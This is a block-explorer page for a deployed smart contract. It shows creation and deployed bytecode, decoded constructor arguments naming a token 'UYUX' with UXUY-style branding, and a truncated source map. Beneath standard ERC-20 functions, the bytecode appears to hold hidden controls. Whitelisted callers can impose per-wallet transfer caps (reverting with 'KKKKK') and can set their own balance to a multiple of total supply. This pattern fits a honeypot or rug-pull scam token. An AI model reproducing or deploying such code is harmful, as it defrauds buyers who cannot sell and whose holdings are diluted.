0000000000000000000000000000081565b60006009905090565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000806105436108f2565b90506105648185856105558589610783565b61055f91906115af565b6108fa565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c0610f8e565b6105ca600061100c565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546106049061154f565b80601f01602080910402602001604051908101604052809291908181526020018280546106309061154f565b801561067d5780601f106106525761010080835404028352916020019161067d565b820191906000526020600020905b81548152906001019060200180831161066057829003601f168201915b5050505050905090565b6000806106926108f2565b905060006106a08286610783565b9050838110156106e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106dc90611655565b60405180910390fd5b6106f282868684036108fa565b60019250505092915050565b610707816110d0565b50565b6000806107156108f2565b9050610722818585610b4f565b600191505092915050565b610735611139565b15610780576000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610812611139565b1561086c57620f42406005546108289190611675565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b610877610f8e565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108e6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108dd90611729565b60405180910390fd5b6108ef8161100c565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610969576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610960906117bb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109cf9061184d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ab691906113b7565b60405180910390a3505050565b6000610acf8484610783565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b495781811015610b3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b32906118b9565b60405180910390fd5b610b4884848484036108fa565b5b50505050565b6000610ba46000600a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111a590919063ffffffff16565b905081811115610be9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be090611925565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610c58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4f906119b7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbe90611a49565b60405180910390fd5b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610d4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4590611adb565b60405180910390fd5b6000610d786064610d6a600b54876111bb90919063ffffffff16565b6111d190919063ffffffff16565b90506000610d8f82866111a590919063ffffffff16565b9050848303600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555081600160007f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610eee91906113b7565b60405180910390a36000821115610f85577f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f7c91906113b7565b60405180910390a35b50505050505050565b610f966108f2565b73ffffffffffffffffffffffffffffffffffffffff16610fb46105cc565b73ffffffffffffffffffffffffffffffffffffffff161461100a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100190611b47565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6110d8611139565b1561113657806005546110eb9190611675565b600160006110f76108f2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000806111446108f2565b6040516020016111549190611baf565b6040516020818303038152906040528051906020012090506003600082815260200190815260200160002060009054906101000a900460ff161561119c5760019150506111a2565b60009150505b90565b600081836111b39190611bca565b905092915050565b600081836111c99190611675565b905092915050565b600081836111df9190611c2d565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611221578082015181840152602081019050611206565b60008484015250505050565b6000601f19601f8301169050919050565b6000611249826111e7565b61125381856111f2565b9350611263818560208601611203565b61126c8161122d565b840191505092915050565b60006020820190508181036000830152611291818461123e565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112c98261129e565b9050919050565b6112d9816112be565b81146112e457600080fd5b50565b6000813590506112f6816112d0565b92915050565b6000819050919050565b61130f816112fc565b811461131a57600080fd5b50565b60008135905061132c81611306565b92915050565b6000806040838503121561134957611348611299565b5b6000611357858286016112e7565b92505060206113688582860161131d565b9150509250929050565b60008115159050919050565b61138781611372565b82525050565b60006020820190506113a2600083018461137e565b92915050565b6113b1816112fc565b82525050565b60006020820190506113cc60008301846113a8565b92915050565b6000806000606084860312156113eb576113ea611299565b5b60006113f9868287016112e7565b935050602061140a868287016112e7565b925050604061141b8682870161131d565b9150509250925092565b61142e816112be565b82525050565b60006020820190506114496000830184611425565b92915050565b600060ff82169050919050565b6114658161144f565b82525050565b6000602082019050611480600083018461145c565b92915050565b60006020828403121561149c5761149b611299565b5b60006114aa848285016112e7565b91505092915050565b6000602082840312156114c9576114c8611299565b5b60006114d78482850161131d565b91505092915050565b600080604083850312156114f7576114f6611299565b5b6000611505858286016112e7565b9250506020611516858286016112e7565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061156757607f821691505b60208210810361157a57611579611520565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115ba826112fc565b91506115c5836112fc565b92508282019050808211156115dd576115dc611580565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061163f6025836111f2565b915061164a826115e3565b604082019050919050565b6000602082019050818103600083015261166e81611632565b9050919050565b6000611680826112fc565b915061168b836112fc565b9250828202611699816112fc565b915082820484148315176116b0576116af611580565b5b5092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117136026836111f2565b915061171e826116b7565b604082019050919050565b6000602082019050818103600083015261174281611706565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117a56024836111f2565b91506117b082611749565b604082019050919050565b600060208201905081810360008301526117d481611798565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118376022836111f2565b9150611842826117db565b604082019050919050565b600060208201905081810360008301526118668161182a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118a3601d836111f2565b91506118ae8261186d565b602082019050919050565b600060208201905081810360008301526118d281611896565b9050919050565b7f4b4b4b4b4b000000000000000000000000000000000000000000000000000000600082015250565b600061190f6005836111f2565b915061191a826118d9565b602082019050919050565b6000602082019050818103600083015261193e81611902565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119a16025836111f2565b91506119ac82611945565b604082019050919050565b600060208201905081810360008301526119d081611994565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a336023836111f2565b9150611a3e826119d7565b604082019050919050565b60006020820190508181036000830152611a6281611a26565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611ac56026836111f2565b9150611ad082611a69565b604082019050919050565b60006020820190508181036000830152611af481611ab8565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b316020836111f2565b9150611b3c82611afb565b602082019050919050565b60006020820190508181036000830152611b6081611b24565b9050919050565b60008160601b9050919050565b6000611b7f82611b67565b9050919050565b6000611b9182611b74565b9050919050565b611ba9611ba4826112be565b611b86565b82525050565b6000611bbb8284611b98565b60148201915081905092915050565b6000611bd5826112fc565b9150611be0836112fc565b9250828203905081811115611bf857611bf7611580565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611c38826112fc565b9150611c43836112fc565b925082611c5357611c52611bfe565b5b82820490509291505056fea2646970667358221220493a91247ed878c855799b92c9ad8acf98bd9481012e8cea58725a0f4b9b38a164736f6c63430008110033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000003b9aca0000000000000000000000000000000000000000000000000000000000000000254b69636b737461727420796f757220776562332074726164696e672077697468205558555900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000045559555800000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101215760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610320578063b69b486414610350578063dd62ed3e1461036c578063e4703d7c1461039c578063f2fde38b146103b857610121565b8063715018a61461028e5780638da5cb5b1461029857806395d89b41146102b6578063a457c2d7146102d4578063a67334901461030457610121565b806327c8f835116100f457806327c8f835146101c2578063313ce567146101e0578063375460cc146101fe578063395093511461022e57806370a082311461025e57610121565b806306fdde0314610126578063095ea7b31461014457806318160ddd1461017457806323b872dd14610192575b600080fd5b61012e6103d4565b60405161013b9190611277565b60405180910390f35b61015e60048036038101906101599190611332565b610466565b60405161016b919061138d565b60405180910390f35b61017c610489565b60405161018991906113b7565b60405180910390f35b6101ac60048036038101906101a791906113d2565b610493565b6040516101b9919061138d565b60405180910390f35b6101ca6104c2565b6040516101d79190611434565b60405180910390f35b6101e86104e6565b6040516101f5919061146b565b60405180910390f35b61021860048036038101906102139190611486565b6104ef565b60405161022591906113b7565b60405180910390f35b61024860048036038101906102439190611332565b610538565b604051610255919061138d565b60405180910390f35b61027860048036038101906102739190611486565b61056f565b60405161028591906113b7565b60405180910390f35b6102966105b8565b005b6102a06105cc565b6040516102ad9190611434565b60405180910390f35b6102be6105f5565b6040516102cb9190611277565b60405180910390f35b6102ee60048036038101906102e99190611332565b610687565b6040516102fb919061138d565b60405180910390f35b61031e600480360381019061031991906114b3565b6106fe565b005b61033a60048036038101906103359190611332565b61070a565b604051610347919061138d565b60405180910390f35b61036a60048036038101906103659190611486565b61072d565b005b610386600480360381019061038191906114e0565b610783565b60405161039391906113b7565b60405180910390f35b6103b660048036038101906103b19190611486565b61080a565b005b6103d260048036038101906103cd9190611486565b61086f565b005b6060600680546103e39061154f565b80601f016020809104026020016040519081016040528092919081815260200182805461040f9061154f565b801561045c5780601f106104315761010080835404028352916020019161045c565b820191906000526020600020905b81548152906001019060200180831161043f57829003601f168201915b5050505050905090565b6000806104716108f2565b905061047e8185856108fa565b600191505092915050565b6000600554905090565b60008061049e6108f2565b90506104ab858285610ac3565b6104b6858585610b4f565b60019150509392505050565b7f000000000000000000000000000000000000000000000000000000000000dead81565b60006009905090565b6000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000806105436108f2565b90506105648185856105558589610783565b61055f91906115af565b6108fa565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105c0610f8e565b6105ca600061100c565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546106049061154f565b80601f01602080910402602001604051908101604052809291908181526020018280546106309061154f565b801561067d5780601f106106525761010080835404028352916020019161067d565b820191906000526020600020905b81548152906001019060200180831161066057829003601f168201915b5050505050905090565b6000806106926108f2565b905060006106a08286610783565b9050838110156106e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106dc90611655565b60405180910390fd5b6106f282868684036108fa565b60019250505092915050565b610707816110d0565b50565b6000806107156108f2565b9050610722818585610b4f565b600191505092915050565b610735611139565b15610780576000600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610812611139565b1561086c57620f42406005546108289190611675565b600a60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b610877610f8e565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108e6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108dd90611729565b60405180910390fd5b6108ef8161100c565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610969576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610960906117bb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109cf9061184d565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ab691906113b7565b60405180910390a3505050565b6000610acf8484610783565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b495781811015610b3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b32906118b9565b60405180910390fd5b610b4884848484036108fa565b5b50505050565b6000610ba46000600a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546111a590919063ffffffff16565b905081811115610be9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be090611925565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610c58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c4f906119b7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610cc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbe90611a49565b60405180910390fd5b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610d4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4590611adb565b60405180910390fd5b6000610d786064610d6a600b54876111bb90919063ffffffff16565b6111d190919063ffffffff16565b90506000610d8f82866111a590919063ffffffff16565b9050848303600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555081600160007f000000000000000000000000000000000000000000000000000000000000dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610eee91906113b7565b60405180910390a36000821115610f85577f000000000000000000000000000000000000000000000000000000000000dead73ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f7c91906113b7565b60405180910390a35b50505050505050565b610f966108f2565b73ffffffffffffffffffffffffffffffffffffffff16610fb46105cc565b73ffffffffffffffffffffffffffffffffffffffff161461100a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100190611b47565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6110d8611139565b1561113657806005546110eb9190611675565b600160006110f76108f2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b6000806111446108f2565b6040516020016111549190611baf565b6040516020818303038152906040528051906020012090506003600082815260200190815260200160002060009054906101000a900460ff161561119c5760019150506111a2565b60009150505b90565b600081836111b39190611bca565b905092915050565b600081836111c99190611675565b905092915050565b600081836111df9190611c2d565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611221578082015181840152602081019050611206565b60008484015250505050565b6000601f19601f8301169050919050565b6000611249826111e7565b61125381856111f2565b9350611263818560208601611203565b61126c8161122d565b840191505092915050565b60006020820190508181036000830152611291818461123e565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112c98261129e565b9050919050565b6112d9816112be565b81146112e457600080fd5b50565b6000813590506112f6816112d0565b92915050565b6000819050919050565b61130f816112fc565b811461131a57600080fd5b50565b60008135905061132c81611306565b92915050565b6000806040838503121561134957611348611299565b5b6000611357858286016112e7565b92505060206113688582860161131d565b9150509250929050565b60008115159050919050565b61138781611372565b82525050565b60006020820190506113a2600083018461137e565b92915050565b6113b1816112fc565b82525050565b60006020820190506113cc60008301846113a8565b92915050565b6000806000606084860312156113eb576113ea611299565b5b60006113f9868287016112e7565b935050602061140a868287016112e7565b925050604061141b8682870161131d565b9150509250925092565b61142e816112be565b82525050565b60006020820190506114496000830184611425565b92915050565b600060ff82169050919050565b6114658161144f565b82525050565b6000602082019050611480600083018461145c565b92915050565b60006020828403121561149c5761149b611299565b5b60006114aa848285016112e7565b91505092915050565b6000602082840312156114c9576114c8611299565b5b60006114d78482850161131d565b91505092915050565b600080604083850312156114f7576114f6611299565b5b6000611505858286016112e7565b9250506020611516858286016112e7565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061156757607f821691505b60208210810361157a57611579611520565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115ba826112fc565b91506115c5836112fc565b92508282019050808211156115dd576115dc611580565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061163f6025836111f2565b915061164a826115e3565b604082019050919050565b6000602082019050818103600083015261166e81611632565b9050919050565b6000611680826112fc565b915061168b836112fc565b9250828202611699816112fc565b915082820484148315176116b0576116af611580565b5b5092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006117136026836111f2565b915061171e826116b7565b604082019050919050565b6000602082019050818103600083015261174281611706565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117a56024836111f2565b91506117b082611749565b604082019050919050565b600060208201905081810360008301526117d481611798565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118376022836111f2565b9150611842826117db565b604082019050919050565b600060208201905081810360008301526118668161182a565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118a3601d836111f2565b91506118ae8261186d565b602082019050919050565b600060208201905081810360008301526118d281611896565b9050919050565b7f4b4b4b4b4b000000000000000000000000000000000000000000000000000000600082015250565b600061190f6005836111f2565b915061191a826118d9565b602082019050919050565b6000602082019050818103600083015261193e81611902565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119a16025836111f2565b91506119ac82611945565b604082019050919050565b600060208201905081810360008301526119d081611994565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a336023836111f2565b9150611a3e826119d7565b604082019050919050565b60006020820190508181036000830152611a6281611a26565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611ac56026836111f2565b9150611ad082611a69565b604082019050919050565b60006020820190508181036000830152611af481611ab8565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b316020836111f2565b9150611b3c82611afb565b602082019050919050565b60006020820190508181036000830152611b6081611b24565b9050919050565b60008160601b9050919050565b6000611b7f82611b67565b9050919050565b6000611b9182611b74565b9050919050565b611ba9611ba4826112be565b611b86565b82525050565b6000611bbb8284611b98565b60148201915081905092915050565b6000611bd5826112fc565b9150611be0836112fc565b9250828203905081811115611bf857611bf7611580565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000611c38826112fc565b9150611c43836112fc565b925082611c5357611c52611bfe565b5b82820490509291505056fea2646970667358221220493a91247ed878c855799b92c9ad8acf98bd9481012e8cea58725a0f4b9b38a164736f6c63430008110033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000003b9aca0000000000000000000000000000000000000000000000000000000000000000254b69636b737461727420796f757220776562332074726164696e672077697468205558555900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000045559555800000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): Kickstart your web3 trading with UXUY
Arg [1] : symbol_ (string): UYUX
Arg [2] : tokenAmount_ (uint40): 1000000000
-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000000000000000000000000000000000003b9aca00
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000025
Arg [4] : 4b69636b737461727420796f757220776562332074726164696e672077697468
Arg [5] : 2055585559000000000000000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [7] : 5559555800000000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
6435:18117:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7587:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8598:165;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7991:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8774:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6862:81;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7904:76;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11508:90;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9493:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8093:111;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5583:103;;;:::i;:::-;;5273:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7806:88;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10234:422;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11604:57;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8204:157;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11287:96;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8452:135;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11389:113;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5841:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7587:100;7641:13;7674:5;7667:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7587:100;:::o;8598:165::-;8681:4;8688:13;8704:12;:10;:12::i;:::-;8688:28;;8717:32;8726:5;8733:7;8742:6;8717:8;:32::i;:::-;8757:4;8750:11;;;8598:165;;;;:::o;7991:92::-;8052:7;8069:12;;8062:19;;7991:92;:::o;8774:295::-;8905:4;8922:15;8940:12;:10;:12::i;:::-;8922:30;;8963:38;8979:4;8985:7;8994:6;8963:15;:38::i;:::-;9012:27;9022:4;9028:2;9032:6;9012:9;:27::i;:::-;9057:4;9050:11;;;8774:295;;;;;:::o;6862:81::-;;;:::o;7904:76::-;7962:5;7977:1;7970:8;;7904:76;:::o;11508:90::-;11561:7;11579:12;:17;11592:3;11579:17;;;;;;;;;;;;;;;;11572:24;;11508:90;;;:::o;9493:238::-;9581:4;9598:13;9614:12;:10;:12::i;:::-;9598:28;;9637:64;9646:5;9653:7;9690:10;9662:25;9672:5;9679:7;9662:9;:25::i;:::-;:38;;;;:::i;:::-;9637:8;:64::i;:::-;9719:4;9712:11;;;9493:238;;;;:::o;8093:111::-;8167:7;8184:9;:18;8194:7;8184:18;;;;;;;;;;;;;;;;8177:25;;8093:111;;;:::o;5583:103::-;5159:13;:11;:13::i;:::-;5648:30:::1;5675:1;5648:18;:30::i;:::-;5583:103::o:0;5273:87::-;5319:7;5346:6;;;;;;;;;;;5339:13;;5273:87;:::o;7806:88::-;7862:13;7885:7;7878:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7806:88;:::o;10234:422::-;10327:4;10344:13;10360:12;:10;:12::i;:::-;10344:28;;10383:24;10410:25;10420:5;10427:7;10410:9;:25::i;:::-;10383:52;;10474:15;10454:16;:35;;10446:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;10559:60;10568:5;10575:7;10603:15;10584:16;:34;10559:8;:60::i;:::-;10644:4;10637:11;;;;10234:422;;;;:::o;11604:57::-;11649:10;11655:3;11649:5;:10::i;:::-;11604:57;:::o;8204:157::-;8283:4;8290:13;8306:12;:10;:12::i;:::-;8290:28;;8319;8329:5;8336:2;8340:6;8319:9;:28::i;:::-;8355:4;8348:11;;;8204:157;;;;:::o;11287:96::-;11343:12;:10;:12::i;:::-;11340:42;;;11378:1;11358:12;:17;11371:3;11358:17;;;;;;;;;;;;;;;:21;;;;11340:42;11287:96;:::o;8452:135::-;8541:7;8558:11;:18;8570:5;8558:18;;;;;;;;;;;;;;;:27;8577:7;8558:27;;;;;;;;;;;;;;;;8551:34;;8452:135;;;;:::o;11389:113::-;11445:12;:10;:12::